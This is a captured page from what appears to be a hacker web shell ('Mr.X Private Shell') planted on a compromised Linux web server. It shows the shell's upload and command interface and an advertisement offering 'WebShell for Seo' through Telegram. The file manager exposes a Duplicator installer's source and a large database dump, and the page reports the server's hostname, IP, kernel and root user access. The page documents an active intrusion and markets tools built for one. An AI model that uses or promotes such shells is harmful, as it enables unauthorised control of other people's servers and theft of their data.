__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
Upload:
Command:
<?php /* * Duplicator Website Installer * Copyright (C) 2018, Snap Creek LLC * website: snapcreek.com * * Duplicator (Pro) Plugin is distributed under the GNU General Public License, Version 3, * June 2007. Copyright (C) 2007 Free Software Foundation, Inc., 51 Franklin * St, Fifth Floor, Boston, MA 02110, USA * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR * ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON * ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ if (!defined('DUPXABSPATH')) { define('DUPXABSPATH', dirname(__FILE__)); } $disabled_dirs = array( 'backups-dup-lite', 'wp-snapshots' ); if (in_array(basename(dirname(__FILE__)), $disabled_dirs)) { die; } define('DUPX_VERSION', '1.5.6'); define('DUPX_INIT', str_replace('\\', '/', dirname(__FILE__))); define('DUPX_ROOT', preg_match('/^[\\\\\/]?$/', dirname(DUPX_INIT)) ? '/' : dirname(DUPX_INIT)); use Duplicator\Installer\Utils\Log\Log; use Duplicator\Libs\Snap\SnapUtil; require_once(DUPX_INIT . '/src/Utils/Autoloader.php'); Duplicator\Installer\Utils\Autoloader::register(); try { /** * init constants and include */ Duplicator\Installer\Core\Bootstrap::init(); Log::setThrowExceptionOnError(true); Log::logTime('INIT END', Log::LV_DETAILED); // if is ajax always die in controller DUPX_Ctrl_ajax::controller(); } catch (Exception $ex) { Log::logException($ex, Log::LV_DEFAULT, 'EXCEPTION ON INIT: '); dupxTplRender('page-boot-error', array( 'message' => $ex->getMessage(), 'trace' => $ex->getTraceAsString() )); die(); } ob_start(); try { $controller = DUPX_CTRL::getInstance(); $exceptionError = false; // Log::error thotw an exception Log::setThrowExceptionOnError(true); Log::logTime('CONTROLLER START', Log::LV_DETAILED); $controller->mainController(); } catch (Exception $e) { SnapUtil::obCleanAll(false); $controller->setExceptionPage($e); } /** * clean output */ $unespectOutput = trim(ob_get_clean()); ob_end_clean(); if (!empty($unespectOutput)) { Log::info('ERROR: Unespect output ' . Log::v2str($unespectOutput)); $exceptionError = new Exception('Unespected output ' . Log::v2str($unespectOutput)); $controller->setExceptionPage($exceptionError); } ob_start(); try { echo $controller->renderPage(); } catch (Exception $e) { SnapUtil::obCleanAll(false); ob_end_clean(); $controller->setExceptionPage($e); echo $controller->renderPage(); }
Filemanager
Name | Type | Size | Permission | Actions |
---|---|---|---|---|
addons | Folder | 0755 |
|
|
assets | Folder | 0755 |
|
|
classes | Folder | 0755 |
|
|
ctrls | Folder | 0755 |
|
|
favicon | Folder | 0755 |
|
|
libs | Folder | 0755 |
|
|
original_files_7965eeb-05080426 | Folder | 0755 |
|
|
src | Folder | 0755 |
|
|
templates | Folder | 0755 |
|
|
vendor | Folder | 0755 |
|
|
dup-archive__7965eeb-05080426.txt | File | 56.03 KB | 0666 |
|
dup-database__7965eeb-05080426.sql | File | 635.8 MB | 0666 |
|
dup-manual-extract__7965eeb-05080426 | File | 0 B | 0666 |
|
dup-scan__7965eeb-05080426.json | File | 2.82 MB | 0666 |
|
dup-scanned-dirs__7965eeb-05080426.txt | File | 239.99 KB | 0666 |
|
dup-scanned-files__7965eeb-05080426.txt | File | 2.13 MB | 0666 |
|
index.php | File | 109 B | 0666 |
|
main.installer.php | File | 3.06 KB | 0666 |
|
Server Info
- Hostname: milna-web
- IP Address: 172.31.26.98
- PHP Version: 7.4.33
- Server Software: Apache/2.4.58 (Ubuntu)
- HDD Total Space: 18.33 GB
- HDD Free Space: 2.47 GB
- Total Domains in Server: 2
- System: Linux milna-web 6.8.0-1018-aws #20-Ubuntu SMP Thu Oct 10 18:14:42 UTC 2024 x86_64
System Info
User Info
- Username: root
- User ID: 0
- Group ID: 0
Copyright reserved © 2025 xtooler.online Shell Coded By Mr.X
01
2018